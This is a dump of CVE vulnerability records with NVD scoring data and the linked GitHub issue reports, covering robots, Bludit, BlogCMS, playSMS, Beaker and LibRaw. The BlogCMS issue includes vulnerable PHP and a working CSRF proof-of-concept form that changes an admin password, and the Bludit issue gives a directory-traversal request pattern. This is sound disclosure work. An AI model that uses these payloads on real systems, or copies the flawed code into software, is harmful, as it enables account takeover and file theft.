"versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:uvd-robots:uvd_robots:-:*:*:*:*:*:*:*", "matchCriteriaId": "4FD4ACEB-1184-47AB-86E4-732DA183E8AE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "287" ]
287
https://github.com/aliasrobotics/RVD/issues/2561
[ "Third Party Advisory" ]
github.com
[ "aliasrobotics", "RVD" ]
```yaml id: 2561 title: 'RVD#2561: Unprotected BIOS allows user to boot from live OS image.' type: vulnerability description: The BIOS onboard MiR's Computer is not protected by password, therefore, it allows a Bad Operator to modify settings such as boot order. This can be leveraged by a Malicious operator to boot from a Live Image. cwe: CWE-284 cve: CVE-2020-10278 keywords: - MiR100, MiR200, MiR500, MiR250, MiR1000, ER200, ER-Lite, ER-Flex, ER-One, UVD system: MiR100:v2.8.1.1 and before, MiR200, MiR250, MiR500, MiR1000, ER200, ER-Lite, ER-Flex, ER-One, UVD vendor: Mobile Industrial Robots A/S, EasyRobotics, Enabled Robotics, UVD Robots severity: rvss-score: 7.1 rvss-vector: RVSS:1.0/AV:PR/AC:L/PR:N/UI:N/S:C/Y:Z/C:N/I:L/A:H/H:N/ severity-description: High cvss-score: 6.1 cvss-vector: CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:H links: - https://cwe.mitre.org/data/definitions/284.html - https://github.com/aliasrobotics/RVD/issues/2561 flaw: phase: runtime-operation specificity: general issue architectural-location: platform-specific application: system-bios subsystem: N/A package: N/A languages: N/A date-detected: 2020-06-11 detected-by: Lander Usategui, Alfonso Glera (Alias Robotics) detected-by-method: testing-dynamic date-reported: '2020-06-24' reported-by: "Victor Mayoral Vilches (Alias Robotics)" reported-by-relationship: security researcher issue: https://github.com/aliasrobotics/RVD/issues/2561 reproducibility: Always trace: Not disclosed reproduction: Not disclosed reproduction-image: Not disclosed exploitation: description: Not disclosed exploitation-image: Not disclosed exploitation-vector: Not disclosed exploitation-recipe: '' mitigation: description: Not disclosed pull-request: Not disclosed date-mitigation: null ```
RVD#2561: Unprotected BIOS allows user to boot from live OS image.
https://api.github.com/repos/aliasrobotics/RVD/issues/2561/comments
0
2020-06-24T04:51:45Z
2020-07-10T06:38:06Z
https://github.com/aliasrobotics/RVD/issues/2561
644,316,102
2,561
1,317
CVE-2020-10280
2020-06-24T06:15:11.620
The Apache server on port 80 that host the web interface is vulnerable to a DoS by spamming incomplete HTTP headers, effectively blocking the access to the dashboard.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 4.2, "source": "cve@aliasrobotics.com", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@aliasrobotics.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/2568" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/2568" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robots:mir100_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "4C1ED80A-1AE1-4868-AD13-F37079F69B60", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robots:mir100:-:*:*:*:*:*:*:*", "matchCriteriaId": "11F1060F-0F43-4920-A05D-593E784B1A0B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robots:mir200_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "0E52858B-51DE-44BC-A4BB-D199F1281D72", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robots:mir200:-:*:*:*:*:*:*:*", "matchCriteriaId": "2B0F7F08-D5D5-4DA8-B2B2-5EA2997AEE3D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robots:mir250_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "0F19DD45-1C6E-498C-A961-5EDB4823B12C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robots:mir250:-:*:*:*:*:*:*:*", "matchCriteriaId": "44C6FCBE-E111-419E-8F8D-2F4702D821BA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robots:mir500_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "8C63DB5B-961D-4FDD-AB12-01DC24AFC0B9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robots:mir500:-:*:*:*:*:*:*:*", "matchCriteriaId": "E2BC5C9E-1AF3-4009-844E-6E64E4D766A8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robots:mir1000_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "171A2B04-114B-4C5F-9F2C-515A1E37F300", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robots:mir1000:-:*:*:*:*:*:*:*", "matchCriteriaId": "C86EB588-CD48-456B-90C6-C482636508AE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:easyrobotics:er200_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "42AB077F-A829-4A9F-8AFF-CBC9222EAE55", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:easyrobotics:er200:-:*:*:*:*:*:*:*", "matchCriteriaId": "C275F303-4494-4C06-95CC-8969E01F8ADA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:easyrobotics:er-lite_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "68599AB3-679D-4E86-B8F4-7939A0373EA2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:easyrobotics:er-lite:-:*:*:*:*:*:*:*", "matchCriteriaId": "53543812-4D0D-4191-8B21-803D2F9790B6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:easyrobotics:er-flex_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "1252DDB6-D090-499B-B505-E17625DB88AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:easyrobotics:er-flex:-:*:*:*:*:*:*:*", "matchCriteriaId": "9D84C826-05A4-44A6-BD12-77805A993A5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:easyrobotics:er-one_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "29230027-8A11-48CA-A4E5-63953EB7CAE3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:easyrobotics:er-one:-:*:*:*:*:*:*:*", "matchCriteriaId": "C7FFA6B9-1A77-4C25-8120-6844B8700527", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:uvd-robots:uvd_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "0C870ABF-C324-442E-9738-025397CB3C47", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:uvd-robots:uvd:-:*:*:*:*:*:*:*", "matchCriteriaId": "87684074-A107-4FE3-A840-C5CB3B8025AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "404" ]
404
https://github.com/aliasrobotics/RVD/issues/2568
[ "Third Party Advisory" ]
github.com
[ "aliasrobotics", "RVD" ]
```yaml id: 2568 title: 'RVD#2568: Apache server is vulnerable to a DoS' type: vulnerability description: The Apache server on port 80 that host the web interface is vulnerable to a DoS by spamming incomplete HTTP headers, effectively blocking the access to the dashboard. cwe: CWE-239 cve: CVE-2020-10280 keywords: - MiR100, MiR200, MiR500, MiR250, MiR1000, ER200, ER-Lite, ER-Flex, ER-One, UVD system: MiR100:v2.8.1.1 and before, MiR200, MiR250, MiR500, MiR1000, ER200, ER-Lite, ER-Flex, ER-One, UVD vendor: Mobile Industrial Robots A/S, EasyRobotics, Enabled Robotics, UVD Robots severity: rvss-score: 6.1 rvss-vector: RVSS:1.0/AV:IN/AC:L/PR:N/UI:N/S:U/Y:Z/C:N/I:L/A:H/H:U/ severity-description: high cvss-score: 8.2 cvss-vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H links: - https://cwe.mitre.org/data/definitions/239.html - https://github.com/aliasrobotics/RVD/issues/2568 flaw: phase: runtime-operation specificity: robotics-specific architectural-location: platform code application: Apache subsystem: Server:Web-Interface package: N/A languages: N/A date-detected: 2020-06-11 detected-by: Lander Usategui (Alias Robotics) detected-by-method: testing-dynamic:alurity date-reported: '2020-06-24' reported-by: null reported-by-relationship: null issue: https://github.com/aliasrobotics/RVD/issues/2568 reproducibility: always trace: Not disclosed reproduction: Not disclosed reproduction-image: Not disclosed exploitation: description: Not disclosed exploitation-image: Not disclosed exploitation-vector: Not disclosed exploitation-recipe: '' mitigation: description: Not disclosed pull-request: Not disclosed date-mitigation: null ```
RVD#2568: Apache server is vulnerable to a DoS
https://api.github.com/repos/aliasrobotics/RVD/issues/2568/comments
0
2020-06-24T05:44:10Z
2020-07-10T06:38:09Z
https://github.com/aliasrobotics/RVD/issues/2568
644,335,617
2,568
1,319
CVE-2020-15006
2020-06-24T11:15:11.980
Bludit 3.12.0 allows stored XSS via JavaScript code in an SVG document to bl-kernel/ajax/logo-upload.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/bludit/bludit/issues/1212" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/bludit/bludit/issues/1212" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bludit:bludit:3.12.0:*:*:*:*:*:*:*", "matchCriteriaId": "6D6D30E3-E730-47C2-BB7F-3C54EB771AFA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/bludit/bludit/issues/1212
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "bludit", "bludit" ]
### Describe your problem https://github.com/bludit/bludit/blob/master/bl-kernel/ajax/logo-upload.php Logo upload only determines the suffix, but not the content, which causes XSS and the user can inject any javascript and html code in the page payload ![image](https://user-images.githubusercontent.com/8120951/85107565-c28ea200-b240-11ea-9967-e68dc6b38462.png) ![image](https://user-images.githubusercontent.com/8120951/85107027-d4237a00-b23f-11ea-904b-143e35b6e1e8.png) ![image](https://user-images.githubusercontent.com/8120951/85107079-ea313a80-b23f-11ea-98e1-3f1d683356d5.png)
Store XSS
https://api.github.com/repos/bludit/bludit/issues/1212/comments
10
2020-06-19T07:23:19Z
2022-02-22T16:10:21Z
https://github.com/bludit/bludit/issues/1212
641,764,976
1,212
1,320
CVE-2020-15014
2020-06-24T13:15:11.660
pramodmahato BlogCMS through 2019-12-31 has admin/changepass.php CSRF.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pramodmahato/BlogCMS/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pramodmahato/BlogCMS/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pramod:blogcms:*:*:*:*:*:*:*:*", "matchCriteriaId": "94FCCF28-520A-48AF-B142-004F8FCC952A", "versionEndExcluding": null, "versionEndIncluding": "2019-12-31", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/pramodmahato/BlogCMS/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "pramodmahato", "BlogCMS" ]
First,let's look at /BlogCMS-master/admin/changepass.php file.This file does not filter the "referer": ``` <?php include("config.php"); session_start(); if(isset($_SESSION['ID'])) { $email=$_SESSION['ID']; } else { $site= "<script type='text/javascript'>window.location='login.php'</script>"; echo $site; } $result = mysqli_query($db,"select *from users where email like '$email';"); $row = mysqli_fetch_assoc($result); $originalpass=$row['Password']; if(isset($_POST['submit'])) { $old=md5($_POST['oldpass']); $new=md5($_POST['newpass']); if($old==$originalpass) { $newsql="UPDATE users SET Password = '$new' WHERE email='$email'"; if(mysqli_query($db, $newsql)){ echo "Password Changed Successfully"; header("Location:login.php"); }else { echo "<script type='text/javascript'>alert('Error updating record: ".$mysqli_error($db)."')</script>"; } } else { echo "<script type='text/javascript'>alert('Invalid Password')</script>"; } } ?> ``` Second,I tested this with the Burp tool. I left out the referer and I added the referer and it returns the same thing. ![image](https://github.com/TGRBirdFlying/picture/blob/screenshots/11.png) Third:I write a poc for this vulnerability:As follows: ``` <!doctype html> <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.0.8/BlogCMS-master/admin/changepass.php" method="POST"> <input type="hidden" name="oldpass" value="111111" /> <input type="hidden" name="newpass" value="222222" /> <input type="hidden" name="submit" value="CHANGE&#32;PASSWORD" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` finnally,After testing, the vulnerability exists.
There is a csrf vulnerability in changepass.php file
https://api.github.com/repos/pramodmahato/BlogCMS/issues/1/comments
0
2020-06-24T06:42:26Z
2020-08-25T14:20:29Z
https://github.com/pramodmahato/BlogCMS/issues/1
644,361,707
1
1,321
CVE-2020-15018
2020-06-24T13:15:11.740
playSMS through 1.4.3 is vulnerable to session fixation.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 2.5, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/antonraharja/playSMS/issues/605" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/antonraharja/playSMS/issues/605" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:playsms:playsms:*:*:*:*:*:*:*:*", "matchCriteriaId": "48CD3510-5247-4DC3-8462-A632A8CA1E5C", "versionEndExcluding": null, "versionEndIncluding": "1.4.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "384" ]
384
https://github.com/antonraharja/playSMS/issues/605
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "antonraharja", "playSMS" ]
PlaySMS is vulnerable to Session fixation ( all versions, including the latest ). Due to the lack of randomization of the sessionID and reuse of sessionID (prior login, after login). An attacker can set the user's session and can take control of the user's account. Steps to reproduce: 1. Login to PlaySMS ( Note down the value of cookie [ PHPSESSID ] ). 2. Logout. 3. You can confirm the same session by checking prior login and after logging in. 4. You can observe that the value of PHPSESSID will be the same as in Step 1
Session Fixation
https://api.github.com/repos/playsms/playsms/issues/605/comments
1
2020-03-20T06:59:49Z
2020-05-01T17:26:38Z
https://github.com/playsms/playsms/issues/605
584,879,228
605
1,322
CVE-2020-15026
2020-06-24T19:15:10.287
Bludit 3.12.0 allows admins to use a /plugin-backup-download?file=../ directory traversal approach for arbitrary file download via backup/plugin.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/bludit/bludit/issues/1214" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/bludit/bludit/issues/1214" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bludit:bludit:3.12.0:*:*:*:*:*:*:*", "matchCriteriaId": "6D6D30E3-E730-47C2-BB7F-3C54EB771AFA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/bludit/bludit/issues/1214
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "bludit", "bludit" ]
### **problem** hi, The problem is in the backup plugin, the $file parameter is not filtered, resulting in arbitrary file downloads ### **recurrent** ![image](https://user-images.githubusercontent.com/21289548/85357036-16500280-b543-11ea-9c7b-10d78fbf6e57.png) ### **repair** [https://github.com/bludit/bludit/blob/e3abd64fe47350c7de8d51fe02342e6af3b2944e/bl-plugins/backup/plugin.php#L97](url) Filter $file parameter
Arbitrary file download vulnerability
https://api.github.com/repos/bludit/bludit/issues/1214/comments
1
2020-06-23T03:25:01Z
2020-06-23T17:59:50Z
https://github.com/bludit/bludit/issues/1214
643,500,132
1,214
1,323
CVE-2013-7489
2020-06-26T20:15:11.760
The Beaker library through 1.11.0 for Python is affected by deserialization of untrusted data, which could lead to arbitrary code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 5.2, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 5.1, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 0.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1850105" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/bbangert/beaker/issues/191" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://www.openwall.com/lists/oss-security/2020/05/14/11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1850105" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/bbangert/beaker/issues/191" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://www.openwall.com/lists/oss-security/2020/05/14/11" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:beakerbrowser:beaker:*:*:*:*:*:python:*:*", "matchCriteriaId": "F00F62FC-5ED4-4E5A-8180-B7FFA99C67BF", "versionEndExcluding": null, "versionEndIncluding": "1.11.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/bbangert/beaker/issues/191
[ "Third Party Advisory" ]
github.com
[ "bbangert", "beaker" ]
Hello, Beaker uses Pickle on Session and Cache. On Session at least it has support to secret/HMAC but on caching it doesn't which can lead to arbitrary code execution. https://github.com/bbangert/beaker/issues/35 Maybe it would be wise to expose data_serializer in Cache too and maybe even allow a secret definition for caching and perhaps default to json serialization. What do you think?
Insecure data serialization method by default with pickle on Cache
https://api.github.com/repos/bbangert/beaker/issues/191/comments
14
2020-05-14T18:02:40Z
2022-07-11T16:26:00Z
https://github.com/bbangert/beaker/issues/191
618,431,819
191
1,324
CVE-2020-15365
2020-06-28T13:15:10.157
LibRaw before 0.20-Beta3 has an out-of-bounds write in parse_exif() in metadata\exif_gps.cpp via an unrecognized AtomName and a zero value of tiff_nifds.
